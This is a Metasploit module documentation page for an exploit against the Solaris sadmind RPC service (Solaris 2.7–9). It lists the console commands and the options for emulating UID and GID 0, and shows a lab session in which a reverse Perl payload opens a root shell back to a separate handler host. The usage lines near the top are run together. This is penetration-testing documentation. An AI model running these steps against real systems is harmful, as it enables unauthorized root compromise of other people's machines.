documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
This exploit targets a weakness in the default security settings of the Sun Solstice AdminSuite distributed system administration daemon (sadmind) RPC application. This server is installed and enabled by default on most versions of the Solaris operating system.
Vulnerable systems include Solaris 2.7, 8, and 9.
This module has been successfully tested on:
msfconsoleuse exploit/solaris/sunrpc/sadmind_execset rhosts [rhost]exploitroot user.Remote hostname. The hostname will be detected automatically by default; however, using the automatically detected hostname will fail if the system hostname was changed after the sadmind service was started.
GID to emulate (default: 0)
UID to emulate (default: 0)
msf > use exploit/solaris/sunrpc/sadmind_exec
msf exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
rhosts => 192.168.200.148
msf exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.148:111 - Attempting to determine hostname
[*] 192.168.200.148:111 - Found hostname: unknown
[*] 192.168.200.148:111 - Sending payload (234 bytes)
[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
cat /etc/release
Solaris 8 6/00 s28x_u1wos_08 INTEL
Copyright 2000 Sun Microsystems, Inc. All Rights Reserved.
Assembled 28 April 2000